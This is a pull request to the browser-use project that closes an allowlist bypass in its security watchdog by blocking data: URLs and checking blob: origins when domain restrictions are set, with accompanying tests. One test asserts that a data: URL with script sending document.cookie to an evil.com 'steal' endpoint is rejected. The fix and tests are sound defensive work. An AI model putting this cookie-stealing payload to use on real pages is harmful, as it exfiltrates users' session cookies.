### PR TITLE
fix(browser): block data: and blob: URLs when domain restrictions are configured

### DIFF
--- a/browser_use/browser/watchdogs/security_watchdog.py
+++ b/browser_use/browser/watchdogs/security_watchdog.py
@@ -210,7 +210,11 @@ class SecurityWatchdog(BaseWatchdog):
 				return False
 			# blob: URLs encode their origin as blob:<origin>/<uuid> — only allow
 			# when the origin itself passes the domain checks.
-			return self._is_url_allowed(url[5:])
+			origin_url = url[5:]
+			origin = urlparse(origin_url)
+			if origin.scheme in ['data', 'blob']:
+				return False
+			return self._is_url_allowed(origin_url)
 
 		# Get the actual host (domain)
 		host = parsed.hostname

--- a/browser_use/browser/watchdogs/security_watchdog.py
+++ b/browser_use/browser/watchdogs/security_watchdog.py
@@ -196,9 +196,21 @@ class SecurityWatchdog(BaseWatchdog):
 			# Invalid URL
 			return False
 
-		# Allow data: and blob: URLs (they don't have hostnames)
+		# data: and blob: URLs carry no hostname, so they bypass domain checks by
+		# construction. Allow them only when no domain restrictions are configured:
+		# with a restriction in place, a data: URL can embed script that redirects
+		# or exfiltrates past the allowlist.
 		if parsed.scheme in ['data', 'blob']:
-			return True
+			if (
+				not self.browser_session.browser_profile.allowed_domains
+				and not self.browser_session.browser_profile.prohibited_domains
+			):
+				return True
+			if parsed.scheme == 'data':
+				return False
+			# blob: URLs encode their origin as blob:<origin>/<uuid> — only allow
+			# when the origin itself passes the domain checks.
+			return self._is_url_allowed(url[5:])
 
 		# Get the actual host (domain)
 		host = parsed.hostname

--- a/tests/ci/security/test_domain_filtering.py
+++ b/tests/ci/security/test_domain_filtering.py
@@ -447,7 +447,9 @@ class TestUrlProhibitlistSecurity:
 
 		# The attack scenario from the issue: a data: URL embedding script that redirects/exfiltrates
 		assert (
-			watchdog._is_url_allowed('data:text/html,<script>document.location="https://evil.com/steal?c="+document.cookie</script>')
+			watchdog._is_url_allowed(
+				'data:text/html,<script>document.location="https://evil.com/steal?c="+document.cookie</script>'
+			)
 			is False
 		)
 		assert watchdog._is_url_allowed('data:text/plain,hello') is False

--- a/tests/ci/security/test_domain_filtering.py
+++ b/tests/ci/security/test_domain_filtering.py
@@ -434,6 +434,42 @@ class TestUrlProhibitlistSecurity:
 		assert watchdog._is_url_allowed('https://WWW.EXAMPLE.COM') is False
 		assert watchdog._is_url_allowed('https://mail.example.com') is True
 
+	def test_data_url_blocked_when_domain_restricted(self):
+		"""data: URLs must not bypass allowed_domains (script-execution / exfiltration vector)."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# The attack scenario from the issue: a data: URL embedding script that redirects/exfiltrates
+		assert (
+			watchdog._is_url_allowed('data:text/html,<script>document.location="https://evil.com/steal?c="+document.cookie</script>')
+			is False
+		)
+		assert watchdog._is_url_allowed('data:text/plain,hello') is False
+
+		# blob: URLs are allowed only when their encoded origin passes the domain checks
+		assert watchdog._is_url_allowed('blob:https://example.com/uuid') is True
+		assert watchdog._is_url_allowed('blob:https://evil.com/uuid') is False
+
+	def test_data_and_blob_urls_allowed_without_restrictions(self):
+		"""data: and blob: URLs keep working when no domain restrictions are configured."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		assert watchdog._is_url_allowed('data:text/html,<script>alert(1)</script>') is True
+		assert watchdog._is_url_allowed('blob:https://example.com/uuid') is True
+
 
 class TestDomainListOptimization:
 	"""Tests for domain list optimization (set conversion for large lists)."""

--- a/tests/ci/security/test_domain_filtering.py
+++ b/tests/ci/security/test_domain_filtering.py
@@ -457,6 +457,7 @@ class TestUrlProhibitlistSecurity:
 		# blob: URLs are allowed only when their encoded origin passes the domain checks
 		assert watchdog._is_url_allowed('blob:https://example.com/uuid') is True
 		assert watchdog._is_url_allowed('blob:https://evil.com/uuid') is False
+		assert watchdog._is_url_allowed('blob:blob:https://example.com/uuid') is False
 
 	def test_data_and_blob_urls_allowed_without_restrictions(self):
 		"""data: and blob: URLs keep working when no domain restrictions are configured."""


### PR DESCRIPTION
Closes #4763

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Blocks `data:` URLs and applies domain checks to `blob:` origins when domain restrictions are enabled, closing an allowlist bypass. Previously both schemes skipped checks; now `data:` is blocked under restrictions and `blob:` is allowed only if its encoded origin passes. Closes #4763.

- Block `data:` when `allowed_domains` or `prohibited_domains` are set.
- Allow `blob:` only if its origin passes domain checks; unchanged when no restrictions.
- Add tests for restricted and unrestricted `data:`/`blob:` cases.

<sup>Written for commit 8e22852d3e40dde1eadcea6f7ead5c87675c974b. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/browser-use/browser-use/pull/5351?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

